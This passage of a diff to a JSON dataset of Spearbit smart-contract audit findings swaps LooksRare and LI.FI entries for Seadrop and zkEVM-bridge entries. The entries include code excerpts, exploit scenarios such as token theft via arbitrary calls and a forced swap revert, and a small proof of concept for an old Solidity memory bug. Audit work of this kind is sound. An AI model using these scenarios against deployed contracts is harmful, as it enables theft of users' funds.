0. A transaction that tries to mint an NFT in this case with an empty proof (or any other proof) should revert. There were no tests for this case.", "labels": [ "Spearbit", - "LooksRare", + "Seadrop", "Severity: Informational" ] }, { - "title": "_transferFungibleTokens does not check whether the amount is 0", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "_transferFungibleTokens does not check whether amount is 0 to skip transferring to the recipient. For the ask recipient and creator amounts the check is performed just before calling this function. But the check is missing for the affiliate and protocol fees.", + "title": "Consider naming state variables as public to replace the user-defined getters", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", + "body": "Several state variables, for example mapping(address => PublicDrop) private _publicDrops;, have private visibility but have corresponding getters defined (function getPublicDrop(address nftContract)). Replacing private by public and renaming the variable can decrease the code. There are several examples of the above pattern in the codebase; however, we are only listing one here for brevity.", "labels": [ "Spearbit", - "LooksRare", + "Seadrop", "Severity: Informational" ] }, { - "title": "StrategyItemIdsRange.executeStrategyWithTakerAsk - Maker's bid amount might be entirely fulfilled by a single ERC1155 item", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "StrategyItemIdsRange allows a buyer to specify a range of potential item ids (both ERC721 and ERC1155) and a desired amount, then a seller can match the buyer's request by picking a subset of items from the provided range so that the desired amount of items is eventually fulfilled.
a taker might pick a single ERC1155 item id from the range and fulfill the entire order with multiple instances of that same item.", + "title": "Use bytes.concat instead of abi.encodePacked for concatenation", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", + "body": "While one of the uses of abi.encodePacked is to perform concatenation, the Solidity language does contain a reserved function for this: bytes.concat.", "labels": [ "Spearbit", - "LooksRare", + "Seadrop", "Severity: Informational" ] }, { - "title": "Define named constants", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": " ExecutionManager.sol#L289 : 0x7476320f is cast sig \"OutsideOfTimeRange()\" TransferSelectorNFT.sol#L30 : 0xa7bc96d3 is cast sig \"transferItemsERC721(address,address,address,uint256[],uint256[])\" and can be replaced by TransferManager.transferItemsERC721.selector TransferSelectorNFT.sol#L31 : 0xa0a406c6 is cast sig \"transferItemsERC1155(address,address,address,uint256[],uint256[])\" and can be replaced by TransferManager.transferItemsERC1155.selector.", + "title": "Misleading comment", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", + "body": "The comment says // Check that the sender is the owner of the allowedNftTokenId.. However, minter isn't necessarily the sender due to how it's set: address minter = minterIfNotPayer != address(0) ? minterIfNotPayer : msg.sender;.", "labels": [ "Spearbit", - "LooksRare", + "Seadrop", "Severity: Informational" ] }, { - "title": "price validation in executeStrategyWithTakerAsk, executeCollectionStrategyWithTakerAsk and executeCollectionStrategyWithTakerAskWithProof can be relaxed", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "In the above context, a maker is bidding a maximum price p_max and a taker is asking a minimum price p_min; the strategy should calculate a price p in the range [p_min, p_max], and so we would need to have p_min <= p_max. The above strategies pick the execution price to be p_max (the maximum price bid by the maker), and since the taker is the caller to the protocol we would only need to require p_min <= p_max. But the current requirement is p_min = p_max: if ( ... || makerBid.maxPrice != takerAsk.minPrice) { revert AskTooHigh(); }", + "title": "Use i instead of j as an index name for a non-nested for-loop", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", + "body": "Using an index named j instead of i is confusing, as this naming convention makes developers expect that the for-loop is nested, but this is not the case. Using i is more standard and less surprising.", "labels": [ "Spearbit", - "LooksRare", + "Seadrop", "Severity: Informational" ] }, { - "title": "Change occurrences of whitelist to allowlist and blacklist to blocklist", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "In the codebase, whitelist (blacklist) is used to represent entities or objects that are allowed (denied) to be used or perform certain tasks.
This word is not very accurate/suggestive and can also be offensive.", + "title": "Avoid duplicating code for consistency", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", + "body": "The _checkActive function is used in every mint function besides mintPublic, where the code is almost the same.", "labels": [ "Spearbit", - "LooksRare", + "Seadrop", "Severity: Informational" ] }, { - "title": "Add more documentation on expected priceFeed decimals", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "The Chainlink strategies are making the following assumptions: 1. All priceFeeds in StrategyFloorFromChainlink have a decimals value of 18. 2. The priceFeed in StrategyUSDDynamicAsk has a decimals value of 8. Any priceFeed that is added that does not match these assumptions would lead to incorrect calculations.", + "title": "restrictFeeRecipients is always true for either PublicDrop or TokenGatedDrop in ERC721SeaDrop", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", + "body": "restrictFeeRecipients is always true for either PublicDrops or TokenGatedDrops. When either one of these drops gets created/updated by calling one of the four functions below on an ERC721SeaDrop contract, its value is hardcoded as true: updatePublicDrop updatePublicDropFee updateTokenGatedDrop updateTokenGatedDropFee", "labels": [ "Spearbit", - "LooksRare", + "Seadrop", "Severity: Informational" ] }, { - "title": "Code duplicates", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "* In some places, Chainlink staleness is checked using block.timestamp - updatedAt > maxLatency, and in other places it is checked using block.timestamp > maxLatency + updatedAt. Consider refactoring this code into a helper function; otherwise, it would be better to use only one version of the two code snippets across the protocol. The validation check to match assetType with the actual amount of items being transferred is duplicated among the different strategies instead of being implemented once at a higher level, such as in a common function or class that can be reused among the different strategies. _executeStrategyForTakerAsk and _executeStrategyForTakerBid almost share the same code. TakerBid, TakerAsk can be merged into a single struct. MakerBid, MakerAsk can be merged into a single struct.", + "title": "Reformat lines for better readability", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", + "body": "These lines are too long to be readable. A mistake isn't easy to spot.", "labels": [ "Spearbit", - "LooksRare", + "Seadrop", "Severity: Informational" ] }, { - "title": "Low level calls are not recommended as they lack type safety and won't revert for calls to EOAs", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "Low-level calls are not recommended for interaction between different smart contracts in modern versions of the compiler, mainly because they lack type safety, return data size checks, and won't revert for calls to Externally Owned Accounts.", + "title": "Comment is a copy-paste", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", + "body": "This comment is exactly the same as this one.
This is a copy-paste mistake.", "labels": [ "Spearbit", - "LooksRare", + "Seadrop", "Severity: Informational" ] }, { - "title": "Insufficient input validation of orders (especially on the Taker's side)", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "There is a lack of consistency in the validation of parameters, as some fields of the taker's order are checked against the maker's order while others are not. It is worth noting that we have not identified any significant impact caused by this issue. Missing validation of strategyId. Missing validation of collection. Most strategies only validate length mismatches on one side of the order. Also, they don't usually validate that the lengths match between both sides. For example, in the DutchAuction strategy, if the makerAsk has itemIds and amounts arrays of length 2 and 2, then it would be perfectly valid for the takerBid to use itemIds and amounts arrays of length 5 and 7, as long as the first two elements of both arrays match what is expected. (FYI: I filed a related issue for the ItemIdsRange strategy, which I think is a more severe issue because the mismatched lengths can actually be returned from the function).", + "title": "Usage of floating pragma is not recommended", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", + "body": "A floating pragma (^0.8.11) is declared in the files. In foundry.toml: solc_version = '0.8.15' is used for the default build profile. In hardhat.config.ts and hardhat-coverage.config.ts: \"0.8.14\" is used.", "labels": [ "Spearbit", - "LooksRare", + "Seadrop", "Severity: Informational" ] }, { - "title": "LooksRareProtocol's owner can take maker's tokens for signed orders with unimplemented strategyIds", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "If a maker signs an order that uses a strategyId that hasn't been added to the protocol yet, the protocol owner can add a malicious strategy afterward such that a taker would be able to provide no fulfillment but take all the offers.", + "title": "Funds can be sent to a non-existing destination", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "The functions bridgeAsset() and bridgeMessage() do check that the destination network is different than the current network. However, they don't check if the destination network exists. If accidentally the wrong networkId is given as a parameter, then the funds are sent to a non-existing network. If the network were deployed in the future, the funds could be recovered. However, in the meantime they are inaccessible and thus lost for the sender and recipient. Note: other bridges usually have validity checks on the destination. function bridgeAsset(...) ... { require(destinationNetwork != networkID, ... ); ... } function bridgeMessage(...) ... { require(destinationNetwork != networkID, ... ); ... }", "labels": [ "Spearbit", - "LooksRare", - "Severity: Informational" + "zkEVM-bridge", + "Severity: Medium Risk" ] }, { - "title": "Strategies with faulty price feeds can have unwanted consequences", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "In the LooksRare protocol, once a strategy has been added, its implementation and selector cannot be updated.
This is good since users who sign their MakerBid or MakerAsk can trustlessly examine the strategy implementation before including it in their orders. Some strategies might depend on other actors such as price feeds. This is the case for StrategyUSDDynamicAsk and StrategyFloorFromChainlink. If for some reason these price feeds do not return the correct prices, these strategies can deviate slightly from their original intent. Case StrategyUSDDynamicAsk: if the price feed returns a lower price, a taker can bid on an order with that lower price. This scenario is guarded by the MakerAsk's minimum price, but the maker would not receive the expected amount if the correct price had been reported and was greater than the maker's minimum ask. Case StrategyFloorFromChainlink: for executeFixedDiscountCollectionOfferStrategyWithTakerAsk and executeBasisPointsDiscountCollectionOfferStrategyWithTakerAsk, if the price feed reports a floor price higher than the maker's maximum bid price, the taker can match with the maximum bid. Thus the maker ends up paying more than the actual floor adjusted by the discount formula. For executeFixedPremiumStrategyWithTakerBid and executeBasisPointsPremiumStrategyWithTakerBid, if the price feed reports a floor price lower than the maker's minimum ask price, the taker can match with the minimum ask price and pay less than the actual floor price (adjusted by the premium).", + "title": "Fee on transfer tokens", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "The bridge contract will not work properly with fee-on-transfer tokens: 1. User A bridges a fee-on-transfer Token A from Mainnet to Rollup R1 for amount X. 2. In that case X-fees will be received by the bridge contract on Mainnet, but a deposit receipt for the full amount X will be stored in the Merkle tree. 3. The amount is claimed in R1, a new TokenPair for Token A is generated and the full amount X is minted to User A. 4. Now the full amount is bridged back again to Mainnet. 5. When a claim is made on Mainnet, the contract tries to transfer amount X, but since it received the amount X-fees it will use the amount from other users, which eventually causes a DoS for other users using the same token.", "labels": [ "Spearbit", - "LooksRare", - "Severity: Informational" + "zkEVM-bridge", + "Severity: Medium Risk" ] }, { - "title": "The provided price to IERC2981.royaltyInfo does not match the specifications", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "In CreatorFeeManagerWithRoyalties and CreatorFeeManagerWithRebates, if royaltyFeeRegistry.royaltyInfo does not return a non-zero creator address, we check whether the collection supports IERC2981 and, if it does, we loop over each itemId and call the collection's royaltyInfo endpoint. But the input price parameter provided to this endpoint does not match the specification of EIP-2981: /// @param _salePrice - the sale price of the NFT asset specified by _tokenId The price provided in the viewCreatorFeeInfo functions is the price for the whole batch of itemIds and not for the individual tokens itemIds[i] provided to the royaltyInfo endpoint. Even if the return values (newCreator, newCreatorFee) would all match, it would not mean that newCreatorFee should be used as the royalty for the whole batch; a per-item query is sketched below.
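To follow the specification, royaltyInfo could be queried with a per-item price, as in this hypothetical sketch (the per-item price split and the library name are assumptions, not the audited code):

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

interface IERC2981 {
    function royaltyInfo(uint256 tokenId, uint256 salePrice)
        external view returns (address receiver, uint256 royaltyAmount);
}

// Hypothetical sketch: _salePrice refers to the asset specified by _tokenId,
// so each item is queried with its own price rather than the batch total.
library CreatorFeeSketch {
    function creatorFeeForBatch(
        address collection,
        uint256[] memory itemIds,
        uint256[] memory itemPrices // assumed per-item split of the total price
    ) internal view returns (uint256 totalFee) {
        for (uint256 i; i < itemIds.length; i++) {
            (, uint256 fee) = IERC2981(collection).royaltyInfo(itemIds[i], itemPrices[i]);
            totalFee += fee;
        }
    }
}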
An example would be a royalty that is not percentage-based, but a fixed price.", + "title": "Function consolidatePendingState() can be executed during emergency state", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "The function consolidatePendingState() can be executed by everyone even when the contract is in an emergency state. This might interfere with cleaning up the emergency. Most other functions are disallowed during an emergency state. function consolidatePendingState(uint64 pendingStateNum) public { if (msg.sender != trustedAggregator) { require(isPendingStateConsolidable(pendingStateNum),...); } _consolidatePendingState(pendingStateNum); }", "labels": [ "Spearbit", - "LooksRare", - "Severity: Informational" + "zkEVM-bridge", + "Severity: Medium Risk" ] }, { - "title": "Replace the abi.encodeWithSelector with abi.encodeCall to ensure type and typo safety", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "In the context above, abi.encodeWithSelector is used to create the call data for a call to an external contract. This function does not protect against mismatched types being used for the input parameters.", + "title": "Sequencers can re-order forced and non-forced batches", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "Sequencers have a certain degree of control over how non-forced and forced batches are ordered. Consider the case where we have two sets of batches: non-forced (NF) and forced (F). A sequencer can order the batches (F1, F2) and (NF1, NF2) in any order, as long as the internal order of the forced and the non-forced batch sets is kept, i.e. a sequencer can sequence these batches as F1 -> NF1 -> NF2 -> F2 but also equivalently as NF1 -> F1 -> F2 -> NF2.", "labels": [ "Spearbit", - "LooksRare", - "Severity: Informational" + "zkEVM-bridge", + "Severity: Low Risk" ] }, { - "title": "Use the inline keccak256 with the formatting suggested when defining a named constant for an EIP-712 type hash", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "Hardcoded bytes32 EIP-712 type hashes are defined in the OrderStructs library.", + "title": "Check length of smtProof", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "An obscure Solidity bug could be triggered via a call in Solidity 0.4.x; current Solidity versions revert with panic 0x41. The problem could occur if unbounded memory arrays were used. This situation happens to be the case, as verifyMerkleProof() (and all the functions that call it) don't check the length of the array (or loop over the entire array). It also depends on memory variables (for example structs) being used in the functions, which doesn't seem to be the case here.
Here is a PoC of the issue, which can be run in Remix: // SPDX-License-Identifier: MIT // based on https://github.com/paradigm-operations/paradigm-ctf-2021/blob/master/swap/private/Exploit.sol pragma solidity ^0.4.24; // only works with a low solidity version import \"hardhat/console.sol\"; contract test{ struct Overlap { uint field0; } function mint(uint[] memory amounts) public { Overlap memory v; console.log(\"before: \",amounts[0]); v.field0 = 567; console.log(\"after: \",amounts[0]); // would expect to be 0 however is 567 } function go() public { // this part requires the low solidity version bytes memory payload = abi.encodeWithSelector(this.mint.selector, 0x20, 2**251); bool success = address(this).call(payload); console.log(success); } }", "labels": [ "Spearbit", - "LooksRare", - "Severity: Informational" + "zkEVM-bridge", + "Severity: Low Risk" ] }, { - "title": "Hardcode bridge addresses via immutable", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "Most bridge facets call bridge contracts where the bridge address has been supplied as a parameter. This is inherently unsafe because any address could be called. Luckily, the called function signature is hardcoded, which reduces risk. However, it is still possible to call an unexpected function due to potential collisions of function signatures. Users might be tricked into signing a transaction for the LiFi protocol that calls unexpected contracts. One exception is the AxelarFacet, which sets the bridge addresses in initAxelar(); however, this is relatively expensive as it requires an SLOAD to retrieve the bridge addresses. Note: also see \"Facets approve arbitrary addresses for ERC20 tokens\". function startBridgeTokensViaOmniBridge(..., BridgeData calldata _bridgeData) ... { ... _startBridge(_lifiData, _bridgeData, _bridgeData.amount, false); } function _startBridge(..., BridgeData calldata _bridgeData, ...) ... { IOmniBridge bridge = IOmniBridge(_bridgeData.bridge); if (LibAsset.isNativeAsset(_bridgeData.assetId)) { bridge.wrapAndRelayTokens{ ... }(...); } else { ... bridge.relayTokens(...); } ... } contract AxelarFacet { function initAxelar(address _gateway, address _gasReceiver) external { ... s.gateway = IAxelarGateway(_gateway); s.gasReceiver = IAxelarGasService(_gasReceiver); } function executeCallViaAxelar(...) ... { ... s.gasReceiver.payNativeGasForContractCall{ ... }(...); s.gateway.callContract(destinationChain, destinationAddress, payload); } }", + "title": "Transaction delay due to free claimAsset() transactions", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "The sequencer first processes the free claimAsset() transactions and then the rest. This might delay other transactions if there are many free claimAsset() transactions. As these transactions would have to be initiated on the mainnet, the gas costs there will reduce this problem. However, once multiple rollups are supported in the future, the transactions could originate from another rollup with low gas costs. func (s *Sequencer) tryToProcessTx(ctx context.Context, ticker *time.Ticker) { ... appendedClaimsTxsAmount := s.appendPendingTxs(ctx, true, 0, getTxsLimit, ticker) // `claimAsset()` transactions appendedTxsAmount := s.appendPendingTxs(ctx, false, minGasPrice.Uint64(), getTxsLimit-appendedClaimsTxsAmount, ticker) + appendedClaimsTxsAmount ... 
}", "labels": [ "Spearbit", - "LIFI", - "Severity: High Risk" + "zkEVM-bridge", + "Severity: Low Risk" ] }, { - "title": "Tokens are left in the protocol when the swap at the destination chain fails", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "LiFi protocol finds the best bridge route for users. In some cases, it helps users do a swap at the destination chain. With the help of the bridge protocols, LiFi protocol helps users trigger swapAndComplete- BridgeTokensVia{Services} or CompleteBridgeTokensVia{Services} at the destination chain to do the swap. Some bridge services will send the tokens directly to the receiver address when the execution fails. For example, Stargate, Amarok and NXTP do the external call in a try-catch clause and send the tokens directly to the receiver If the receiver is the Executor contract, when it fails. The tokens will stay in the LiFi protocols in this scenario. users can freely pull the tokens. Note: Exploiters can pull the tokens from LiFi protocol, Please refer to the issue Remaining tokens can be sweeped from the LiFi Diamond or the Executor , Issue #82 Exploiters can take a more aggressive strategy and force the victims swap to revert. A possible exploit scenario: A victim wants to swap 10K optimisms BTC into Ethereum mainnet USDC. Since dexs on mainnet have the best liquidity, LiFi protocol helps users to the swap on mainnet The transaction on the source chain (optimism) suceed and the Bridge services try to call Complete- BridgeTokensVia{Services} on mainnet. The exploiter builds a sandwich attack to pump the BTC price. The CompleteBridgeTokens fails since the price is bad. The bridge service does not revert the whole transaction. Instead, it sends the BTC on the mainnet to the receiver (LiFi protocol). The exploiter pulls tokens from the LiFi protocol.", + "title": "Misleading token addresses", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "The function claimAsset() deploys TokenWrapped contracts via create2 and a salt. This salt is based on the originTokenAddress. By crafting specic originTokenAddresses, its possible to create vanity addresses on the other chain. These addresses could be similar to legitimate tokens and might mislead users. Note: it is also possible to directly deploy tokens on the other chain with vanity addresses (e.g. without using the bridge) function claimAsset(...) ... { ... bytes32 tokenInfoHash = keccak256(abi.encodePacked(originNetwork, originTokenAddress)); ... TokenWrapped newWrappedToken = (new TokenWrapped){ salt: tokenInfoHash }(name, symbol, decimals); ... } 8", "labels": [ "Spearbit", - "LIFI", - "Severity: High Risk" + "zkEVM-bridge", + "Severity: Low Risk" ] }, { - "title": "Tokens transferred with Axelar can get lost if the destination transaction cant be executed", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "If _executeWithToken() reverts then the transaction can be retried, possibly with additional gas. See axelar recovery. However there is no option to return the tokens or send them elsewhere. This means that tokens would be lost if the call cannot be made to work. contract Executor is IAxelarExecutable, Ownable, ReentrancyGuard, ILiFi { function _executeWithToken(...) ... { ... 
(bool success, ) = callTo.call(callData); if (!success) revert ExecutionFailed(); } }", + "title": "Limit amount of gas for free claimAsset() transactions", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "Function claimAsset() is subsidized (e.g. gasprice is 0) on L2 and allows calling a custom contract. This could be misused to execute elaborate transactions for free. Note: safeTransfer could also call a custom contract that has been crafted before and bridged to L1. Note: this is implemented in the Go code, which detects transactions to the bridge with function bridgeClaimMethodSignature == \"0x7b6323c1\", which is the selector of claimAsset(). See function IsClaimTx() in transaction.go. function claimAsset(...) ... { ... (bool success, ) = destinationAddress.call{value: amount}(new bytes(0)); ... IERC20Upgradeable(originTokenAddress).safeTransfer(destinationAddress,amount); ... }", "labels": [ "Spearbit", - "LIFI", - "Severity: High Risk" + "zkEVM-bridge", + "Severity: Low Risk" ] }, { - "title": "Use the getStorage() / NAMESPACE pattern instead of global variables", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "The facet DexManagerFacet and the inherited contracts Swapper.sol / SwapperV2.sol define a global variable appStorage on the first storage slot. These two overlap, which in this case is intentional. However, it is dangerous to use this construction in a Diamond contract as this uses delegatecall. If any other contract uses a global variable it will overlap with appStorage, with unpredictable results. This is especially important because it involves access control. For example, if the contract IAxelarExecutable.sol were to be inherited in a facet, then its global variable gateway would overlap. Luckily this is currently not the case. contract DexManagerFacet { ... LibStorage internal appStorage; ... } contract Swapper is ILiFi { ... LibStorage internal appStorage; // overlaps with DexManagerFacet which is intentional ... }", + "title": "What to do with funds that can't be delivered", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "Both claimAsset() and claimMessage() might revert at different locations (even after retrying). Although the funds stay in the bridge, they are not accessible by the originator or recipient of the bridge action, so they are essentially lost for the originator and recipient. Some other bridges have recovery addresses where the funds can be delivered instead. Here are several potential revert situations: function claimAsset(...) ... { ... (bool success, ) = destinationAddress.call{value: amount}(new bytes(0)); require(success, ... ); ... IERC20Upgradeable(originTokenAddress).safeTransfer(destinationAddress,amount); ... TokenWrapped newWrappedToken = (new TokenWrapped){ salt: tokenInfoHash }(name, symbol, decimals); ... } function claimMessage(...) ... { ... (bool success, ) = destinationAddress.call{value: amount}( abi.encodeCall( IBridgeMessageReceiver.onMessageReceived, (originAddress, originNetwork, metadata) ) ); require(success, \"PolygonZkEVMBridge::claimMessage: Message failed\"); ... 
}", "labels": [ "Spearbit", - "LIFI", - "Severity: High Risk" + "zkEVM-bridge", + "Severity: Low Risk" ] }, { - "title": "Decrease allowance when it is already set a non-zero value", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "Non-standard tokens like USDT will revert the transaction when a contract or a user tries to approve an allowance when the spender allowance is already set to a non zero value. For that reason, the previous allowance should be decreased before increasing allowance in the related function. Performing a direct overwrite of the value in the allowances mapping is susceptible to front-running scenarios by an attacker (e.g., an approved spender). As an Openzeppelin mentioned, safeApprove should only be called when setting an initial allowance or when resetting it to zero. 9 function safeApprove( IERC20 token, address spender, uint256 value ) internal { // safeApprove should only be called when setting an initial allowance, // or when resetting it to zero. To increase and decrease it, use // 'safeIncreaseAllowance' and 'safeDecreaseAllowance' require( (value == 0) || (token.allowance(address(this), spender) == 0), \"SafeERC20: approve from non-zero to non-zero allowance\" ); _callOptionalReturn(token, abi.encodeWithSelector(token.approve.selector, spender, value)); } There are four instance of this issue: AxelarFacet.sol is directly using approve function which does not check return value of an external function. The faucet should utilize LibAsset.maxApproveERC20() function like the other faucets. LibAsset s LibAsset.maxApproveERC20() function is used on the other faucets. For instance, USDTs ap- proval mechanism reverts if current allowance is nonzero. From that reason, the function can approve with zero first or safeIncreaseAllowance can be utilized. FusePoolZap.sol is also using approve function which does not check return value . The contract does not import any other libraries, that being the case, the contract should use safeApprove function with approving zero. Executor.sol is directly using approve function which does not check return value of an external function. The contract should utilize LibAsset.maxApproveERC20() function like the other contracts.", + "title": "Inheritance structure does not openly support contract upgrades", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "The solidity compiler uses C3 linearisation to determine the order of contract inheritance. This is performed as left to right of all child contracts before considering the parent contract. Storage slot assignment PolygonZkEVMBridge is as follows: Initializable -> DepositContract -> EmergencyManager -> The Initializable.sol already reserves storage slots for future upgrades and because PolygonZkEVM- Bridge.sol is inherited last, storage slots can be safely appended. 
However, the two intermediate contracts, DepositContract.sol and EmergencyManager.sol, cannot handle storage upgrades.", "labels": [ "Spearbit", - "LIFI", - "Severity: High Risk" + "zkEVM-bridge", + "Severity: Low Risk" ] }, { - "title": "Too generic calls in GenericBridgeFacet allow stealing of tokens", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "With the contract GenericBridgeFacet, the functions swapAndStartBridgeTokensGeneric() (via LibSwap.swap()) and _startBridge() allow arbitrary functions calls, which allow anyone to call transferFrom() and steal tokens from anyone who has given a large allowance to the LiFi protocol. This has been used to hack LiFi in the past. The followings risks also are present: call the Lifi Diamand itself via functions that dont have nonReentrant. perhaps cancel transfers of other users. call functions that are protected by a check on this, like completeBridgeTokensViaStargate. 10 contract GenericBridgeFacet is ILiFi, ReentrancyGuard { function swapAndStartBridgeTokensGeneric( ... LibSwap.swap(_lifiData.transactionId, _swapData[i]); ... } function _startBridge(BridgeData memory _bridgeData) internal { ... (bool success, bytes memory res) = _bridgeData.callTo.call{ value: value ,! }(_bridgeData.callData); ... } } library LibSwap { function swap(bytes32 transactionId, SwapData calldata _swapData) internal { ... (bool success, bytes memory res) = _swapData.callTo.call{ value: nativeValue ,! }(_swapData.callData); ... } }", + "title": "Function calculateRewardPerBatch() could divide by 0", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "The function calculateRewardPerBatch() does a division by totalBatchesToVerify. If there are currently no batches to verify, then totalBatchesToVerify would be 0 and the transaction would revert. When calculateRewardPerBatch() is called from _verifyBatches() this doesn't happen as it will revert earlier. However, when the function is called externally this situation could occur. function calculateRewardPerBatch() public view returns (uint256) { ... uint256 totalBatchesToVerify = ((lastForceBatch - lastForceBatchSequenced) + lastBatchSequenced) - getLastVerifiedBatch(); return currentBalance / totalBatchesToVerify; }", "labels": [ "Spearbit", - "LIFI", - "Severity: High Risk" + "zkEVM-bridge", + "Severity: Low Risk" ] }, { - "title": "LiFi protocol isnt hardened", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "The usage of the LiFi protocol depends largely on off chain APIs. It takes all values, fees, limits, chain ids and addresses to be called from the APIs and doesnt verify them. Several elements are not connected via smart contracts but via the API, for example: the emits of LiFiTransferStarted versus the bridge transactions. the fees paid to the FeeCollector versus the bridge transactions. the Periphery contracts as defined in the PeripheryRegistryFacet versus the rest. In case the API and or frontend contain errors or are hacked then tokens could be easily lost. Also, when calling the LiFi contracts directly or via other smart contracts, it is rather trivial to commit mistakes and loose tokens. Emit data can be easily disturbed by malicious actors, making it unusable. The payment of fees can be easily circumvented by accessing the contracts directly.
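A defensive variant of the divide-by-zero finding above is easy to sketch. This is a minimal illustration assuming the state variables quoted in the excerpt; the reward token source (an IERC20 held by the contract) is an assumption for the sake of a self-contained example:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

interface IERC20 {
    function balanceOf(address account) external view returns (uint256);
}

// Sketch: return 0 instead of reverting when there is nothing to verify.
// State variable names mirror the report's excerpt; the token and the
// getLastVerifiedBatch() stub are illustrative assumptions.
contract RewardSketch {
    IERC20 public immutable rewardToken; // assumption: fees are held in a token
    uint64 public lastForceBatch;
    uint64 public lastForceBatchSequenced;
    uint64 public lastBatchSequenced;

    constructor(IERC20 _rewardToken) {
        rewardToken = _rewardToken;
    }

    function getLastVerifiedBatch() public view returns (uint64) {
        return 0; // elided in the excerpt; returns the last verified batch
    }

    function calculateRewardPerBatch() public view returns (uint256) {
        uint256 currentBalance = rewardToken.balanceOf(address(this));
        uint256 totalBatchesToVerify = ((lastForceBatch - lastForceBatchSequenced) +
            lastBatchSequenced) - getLastVerifiedBatch();
        if (totalBatchesToVerify == 0) return 0; // guard the external call path
        return currentBalance / totalBatchesToVerify;
    }
}
```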
